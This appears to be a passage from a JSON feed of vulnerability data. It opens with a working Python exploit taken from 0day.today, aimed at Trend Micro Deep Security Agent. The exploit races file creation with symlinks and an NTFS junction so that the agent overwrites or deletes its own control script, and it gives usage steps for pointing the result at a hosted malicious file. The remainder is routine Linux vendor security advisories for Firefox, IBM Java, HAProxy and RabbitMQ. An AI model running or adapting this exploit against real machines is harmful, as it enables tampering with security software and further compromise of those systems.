Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that \r\n# are ripe for the writing that can then point to a malicious binary.\r\n\r\n# Usage:\r\n# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. \r\n# 2. Open a browser (preferrably IE) and start the script\r\n# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).\r\n# 4. Keep refreshing the page until you see the script create the target file overwritten.\r\n#\r\n# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. \r\n\r\n\r\nimport time\r\nimport os\r\nimport subprocess\r\nimport sys\r\nimport webbrowser\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\nclass Stage1_Handler(FileSystemEventHandler):\r\n\tdef __init__(self):\r\n\t\tself.filenames = []\r\n\tdef on_created(self, event):\r\n\t\tfilename = os.path.basename(event.src_path)\r\n\t\tif filename in self.filenames:\r\n\t\t\tprint ('Starting symlink creation.')\r\n\t\t\twatcher1.stop()\r\n\t\t\tsymlinkery(self.filenames)\r\n\t\telse:\r\n\t\t\tself.filenames.append(filename)\r\n\t\t\tprint ('File %s created.') % filename\r\n\t\t\t\r\nclass Stage2_Handler(FileSystemEventHandler):\r\n\tdef on_any_event(self, event):\r\n\t\tif os.path.basename(event.src_path) == 'dsa_control.cmd':\r\n\t\t\tprint \"Target file overwritten/deleted. 
Cleaning up.\"\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM CreateSymlink.exe\", shell=True)\r\n\t\t\tsubprocess.Popen(\"taskkill /F /T /IM Baitandswitch.exe\", shell=True)\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\\"')\r\n\t\t\tos.system('rmdir /S /Q \"C:\\\\test\"')\r\n\t\t\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp')\r\n\t\t\twatcher2.stop()\r\n\t\t\tsys.exit(0)\r\n\t\t\t\r\nclass Watcher(object):\r\n\tdef __init__(self, event_handler, path_to_watch):\r\n\t\tself.event_handler = event_handler\r\n\t\tself.path_to_watch = path_to_watch\r\n\t\tself.observer = Observer()\r\n\tdef run(self):\r\n\t\tself.observer.schedule(self.event_handler(), self.path_to_watch)\r\n\t\tself.observer.start()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\ttime.sleep(1)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tself.observer.stop()\r\n\r\n\t\tself.observer.join()\r\n\tdef stop(self):\r\n\t\tself.observer.stop()\r\n\t\t\r\ndef symlinkery(filenames):\r\n\tprint \"Enter symlinkery\"\r\n\tfor filename in filenames:\r\n\t\tprint \"Creating symlink for %s\" % filename\r\n\t\tcmdname = \"start cmd /c CreateSymlink.exe \\\"C:\\\\test\\\\virus\\\\%s\\\" \\\"C:\\\\test\\\\test\\\\symtarget\\\"\" % filename\r\n\t\tsubprocess.Popen(cmdname, shell=True)\r\n\tos.rename('C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp','C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp-orig')\r\n\tos.system('mklink /J \"C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\" C:\\\\test')\r\n\twatcher2.run()\r\n\tprint \"Watcher 2 started\"\r\n\r\ntry:\r\n os.mkdir('C:\\\\test')\r\nexcept:\r\n pass\r\n\r\npath1 = 'C:\\\\ProgramData\\\\Trend Micro\\\\AMSP\\\\temp\\\\virus'\r\npath2 = 'C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\'\r\nwatcher1 = Watcher(Stage1_Handler,path1)\r\nwatcher2 = Watcher(Stage2_Handler,path2)\r\nswitcheroo = \"start cmd /c BaitAndSwitch.exe 
C:\\\\test\\\\test\\\\symtarget \\\"C:\\\\Program Files\\\\Trend Micro\\\\Deep Security Agent\\\\dsa_control.cmd\\\" \\\"C:\\\\windows\\\\temp\\\\deleteme.txt\\\" d\"\r\nsubprocess.Popen(switcheroo, shell=True)\r\nwatcher1.run()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33630"}], "oraclelinux": [{"lastseen": "2019-12-06T17:26:21", "bulletinFamily": "unix", "description": "[68.3.0-1.0.1]\n- Update distribution for Oracle Linux [Orabug: 30143292]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n[68.3.0-1]\n- Update to 68.3.0 ESR\n[68.2.0-4]\n- Added patch for TLS 1.3 support.\n[68.2.0-3]\n- Rebuild\n[68.2.0-2]\n- Rebuild", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "ELSA-2019-4107", "href": "http://linux.oracle.com/errata/ELSA-2019-4107.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-06T09:26:43", "bulletinFamily": "unix", "description": "[68.3.0-1.0.1]\n- Rebuild to pickup Oracle default bookmarks [Orabug: 30069264]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n- Remove upstream references [Orabug: 30530527]\n[68.3.0-1]\n- Update to 68.3.0 ESR\n[68.2.0-4]\n- Added patch for TLS 1.3 support.\n[68.2.0-3]\n- Rebuild", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "ELSA-2019-4111", "href": "http://linux.oracle.com/errata/ELSA-2019-4111.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2019-12-05T18:31:10", "bulletinFamily": "unix", "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.3.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free in worker destruction 
(CVE-2019-17008)\n\n* Mozilla: Memory safety bugs fixed in Firefox 71 and Firefox ESR 68.3 (CVE-2019-17012)\n\n* Mozilla: Buffer overflow in plain text serializer (CVE-2019-17005)\n\n* Mozilla: Use-after-free when performing device orientation checks (CVE-2019-17010)\n\n* Mozilla: Use-after-free when retrieving a document in antitracking (CVE-2019-17011)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T23:02:21", "published": "2019-12-05T20:36:21", "id": "RHSA-2019:4111", "href": "https://access.redhat.com/errata/RHSA-2019:4111", "type": "redhat", "title": "(RHSA-2019:4111) Critical: firefox security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T16:27:10", "bulletinFamily": "unix", "description": "IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 7 to version 7R1 SR4-FP55.\n\nSecurity Fix(es):\n\n* OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892) (CVE-2019-2978)\n\n* OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298) (CVE-2019-2989)\n\n* OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573) (CVE-2019-2945)\n\n* OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690) (CVE-2019-2962)\n\n* OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684) (CVE-2019-2964)\n\n* OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505) (CVE-2019-2973)\n\n* OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532) (CVE-2019-2981)\n\n* OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915) 
(CVE-2019-2983)\n\n* OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292) (CVE-2019-2988)\n\n* OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597) (CVE-2019-2992)\n\n* OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765) (CVE-2019-2999)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:16:08", "published": "2019-12-05T20:03:45", "id": "RHSA-2019:4110", "href": "https://access.redhat.com/errata/RHSA-2019:4110", "type": "redhat", "title": "(RHSA-2019:4110) Moderate: java-1.7.1-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-05T16:26:31", "bulletinFamily": "unix", "description": "IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 7 to version 7R1 SR4-FP55.\n\nSecurity Fix(es):\n\n* OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892) (CVE-2019-2978)\n\n* OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298) (CVE-2019-2989)\n\n* OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573) (CVE-2019-2945)\n\n* OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690) (CVE-2019-2962)\n\n* OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684) (CVE-2019-2964)\n\n* OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505) (CVE-2019-2973)\n\n* OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532) (CVE-2019-2981)\n\n* OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915) 
(CVE-2019-2983)\n\n* OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292) (CVE-2019-2988)\n\n* OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597) (CVE-2019-2992)\n\n* OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765) (CVE-2019-2999)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:15:12", "published": "2019-12-05T20:01:31", "id": "RHSA-2019:4109", "href": "https://access.redhat.com/errata/RHSA-2019:4109", "type": "redhat", "title": "(RHSA-2019:4109) Moderate: java-1.7.1-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-05T16:27:53", "bulletinFamily": "unix", "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.3.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free in worker destruction (CVE-2019-17008)\n\n* Mozilla: Memory safety bugs fixed in Firefox 71 and Firefox ESR 68.3 (CVE-2019-17012)\n\n* Mozilla: Buffer overflow in plain text serializer (CVE-2019-17005)\n\n* Mozilla: Use-after-free when performing device orientation checks (CVE-2019-17010)\n\n* Mozilla: Use-after-free when retrieving a document in antitracking (CVE-2019-17011)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:32:28", "published": "2019-12-05T20:00:15", "id": "RHSA-2019:4108", "href": "https://access.redhat.com/errata/RHSA-2019:4108", "type": "redhat", "title": "(RHSA-2019:4108) Critical: firefox security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2019-12-05T16:27:20", "bulletinFamily": "unix", "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.3.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free in worker destruction (CVE-2019-17008)\n\n* Mozilla: Memory safety bugs fixed in Firefox 71 and Firefox ESR 68.3 (CVE-2019-17012)\n\n* Mozilla: Buffer overflow in plain text serializer (CVE-2019-17005)\n\n* Mozilla: Use-after-free when performing device orientation checks (CVE-2019-17010)\n\n* Mozilla: Use-after-free when retrieving a document in antitracking (CVE-2019-17011)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:32:59", "published": "2019-12-05T19:58:53", "id": "RHSA-2019:4107", "href": "https://access.redhat.com/errata/RHSA-2019:4107", "type": "redhat", "title": "(RHSA-2019:4107) Critical: firefox security update", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2019-12-05T03:26:47", "bulletinFamily": "unix", "description": "This update for haproxy to version 2.0.10 fixes the following issues:\n\n HAProxy was updated to 2.0.10\n\n Security issues fixed:\n\n - CVE-2019-18277: Fixed a potential HTTP smuggling in messages with\n transfer-encoding header missing the \"chunked\" (bsc#1154980).\n - Fixed an improper handling of headers which could have led to injecting\n LFs in H2-to-H1 transfers creating new attack space (bsc#1157712)\n - Fixed an issue where HEADER frames in idle streams are not rejected and\n thus trying to decode them HAProxy crashes (bsc#1157714).\n\n Other issue addressed:\n\n - Macro change in the spec file (bsc#1082318)\n\n More information regarding the release at:\n <a rel=\"nofollow\" 
href=\"http://git.haproxy.org/?p=haproxy-2.0.git;a=commit;h=ac198b92d461515551b95d\">http://git.haproxy.org/?p=haproxy-2.0.git;a=commit;h=ac198b92d461515551b95d</a>\n aae20954b3053ce87e\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n", "modified": "2019-12-05T00:15:11", "published": "2019-12-05T00:15:11", "id": "OPENSUSE-SU-2019:2645-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00019.html", "title": "Security update for haproxy (important)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2019-12-05T21:06:43", "bulletinFamily": "unix", "description": "It was discovered that RabbitMQ incorrectly handled certain inputs. An attacker could possibly use this issue to execute arbitrary code.", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "USN-4214-1", "href": "https://usn.ubuntu.com/4214-1/", "title": "RabbitMQ vulnerability", "type": "ubuntu", "cvss": {"score": 0.0, "vector": "NONE"}}]}